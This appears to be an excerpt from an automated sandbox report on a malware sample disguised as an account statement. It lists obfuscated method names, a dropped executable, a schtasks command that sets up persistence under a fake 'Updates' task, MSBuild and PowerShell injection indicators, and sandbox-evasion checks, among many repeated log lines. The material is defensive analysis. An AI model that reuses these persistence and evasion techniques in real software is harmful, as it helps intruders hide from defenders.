                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, xKKRJ8VTFX4G1N1xGX.csHigh entropy of concatenated method names: 'D3dfiKS5Sp', 'rMefcvvbZK', 'SpffU7HpJA', 'Y3nfB1h5XH', 'NYFflbvhV9', 'DYCfHO444e', 'Ro7fNWUTix', 'B7nfvBrXKx', 'PPSf3hYOWA', 'SjmfJ9OJLq'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, ejlP3Oxj5VTYEvKO5r.cs | High entropy of concatenated method names: 'tZHDsgf5V', 'TqHL6fWn1', 'n4r5VkwwE', 'lcMunrfq2', 'RVYWKd0XW', 'lBY9qKXYe', 'Fx4iZHZBZDR5q6wj5U', 'hTgejTfqLGN7KQHyDI', 'MMDA6kDcf', 'DYEjtPCgx'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, TmNAWqstqFSpLbNpTE.cs | High entropy of concatenated method names: 'pyQQRlBiSp', 'E0vQe21bOq', 'McCQTqJuBH', 'yINTJekOsy', 'vY5TzynDHT', 'zAXQgYfYec', 'LR2QdtQDri', 'w0fQxrxcPL', 'mdVQZ4CeYY', 'xkXQkqk348'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, mFN8l0JlMCpR0cYUUm.cs | High entropy of concatenated method names: 'j0YbdHxUEM', 'yLAbZuoTT0', 'CmEbkWkI0T', 'VRqbRdmdvV', 'JjnbfoL9XJ', 'CW1bng2scv', 'DYFbTRNnyh', 'EpWANXpBum', 'MbQAvxSBmE', 'DPWA3vI2hG'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, kR0DFf3CmMYrZsqb6N.cs | High entropy of concatenated method names: 'PsbAmTPdsH', 'UL4AI1KolP', 'zZFAMYgyW4', 'Un6AhXQrVl', 'YZfAicwbo0', 'MkBAOySJCH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, mHKiENejJDcn6AxJbF.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'CMfx300hPc', 'nkTxJ5PJPg', 'ogsxz1YYcH', 'b1BZgjYLca', 'GFCZdvwC4f', 'C9EZx9j4Aj', 'JcAZZ1cK44', 'qgRnKrpWhesTAI9XFDB'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, yUquE6UMuMSijVwDGu.cs | High entropy of concatenated method names: 'ToString', 'wjeCp9TOsm', 'elwCIZR1jG', 'XLrCM6Or2t', 'B52ChAV4fs', 'Hc7COidv4y', 'r2mCqbdbRk', 'jrwCslyeRR', 'J30Co2JPTW', 'XT5C29RNwW'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, RgfDrXHKnC8jGFqB26.cs | High entropy of concatenated method names: 'UIirv4wQPb', 'W3JrJPpmbb', 'apDAg4jARg', 'rt9AdpI2cx', 'uOFrpJ8Ou2', 'UmZraxJtnF', 'jNqrF5QNWn', 'CVBriPBh2v', 'sQWrcW8ea3', 'VtorU1OQPw'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, T82yWMWSofDuDjyvkJ.cs | High entropy of concatenated method names: 'cH3eLV49E6', 'vTte5vCLHs', 'oYveVjVGRW', 'GTWeWhVeBq', 'hb4etnE68T', 'JZfeCR7GNq', 'g2nerLuvOO', 'bSyeAkjplI', 'RiiebyLH3g', 'yv2ejuWm7c'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, f9UIpU26JvmBTBSctL.cs | High entropy of concatenated method names: 'vfHQYG4MDd', 'lxLQ80Eh3u', 'QJwQDjcDQV', 'RsSQLbiuv5', 'XTdQ7qxngP', 'JvcQ5uSdXS', 'aL5QucoJJX', 'RgDQVmDUTR', 'aucQWNTHuO', 'qASQ96w7M7'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, G4wV8Gf6v2K5jjGjCT.cs | High entropy of concatenated method names: 'Dispose', 'EHid3gFA4w', 'JonxInLaGY', 'MbkXXgYQPF', 'fqYdJivPAb', 'ToJdzxPUPi', 'ProcessDialogKey', 'r2SxgR0DFf', 'pmMxdYrZsq', 'r6Nxx0FN8l'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, TeEwg8iN7vW6LLxRRW.cs | High entropy of concatenated method names: 'hOqt4bLcLD', 'qRutaW7Rmk', 'JvOtiQ1wuX', 'DcZtcWNJdC', 'fnmtIY1ulX', 'xZTtMtD2ll', 'WuCthA6ndI', 'CuCtOQdDiY', 'aRHtqNsKQm', 'zZBtsruW67'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, KVbeayhXmtlCZ27r6N.cs | High entropy of concatenated method names: 'i3FT6EgOZd', 'L0fTYU60io', 'O7ETDqlVyd', 'Yq1TLMDMZA', 'y5HT5YVhCu', 'VlKTu3RKje', 'H9lTWInGs8', 'DR2T9rw2JC', 'v12g6V4xk1vhjN1Ug52', 'bKrGdL4boFxp9Sou1KN'
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File created: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: UPDATED SSTATEMENT OF ACCOUNT.exe PID: 6516, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: TgfQNrhQjjseHY.exe PID: 4460, type: MEMORYSTR
                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive (2 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration (2 identical entries)
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 1780000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 3210000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 1780000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 6560000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 7560000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 7690000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 8690000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 8D20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: 9D20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: AD20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Memory allocated: BD20000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 1230000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 2F00000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Memory allocated: 4F00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 2680000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 23D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 58E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 68E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 6A10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 7A10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Memory allocated: 7DD0000 memory reserve | memory write watch
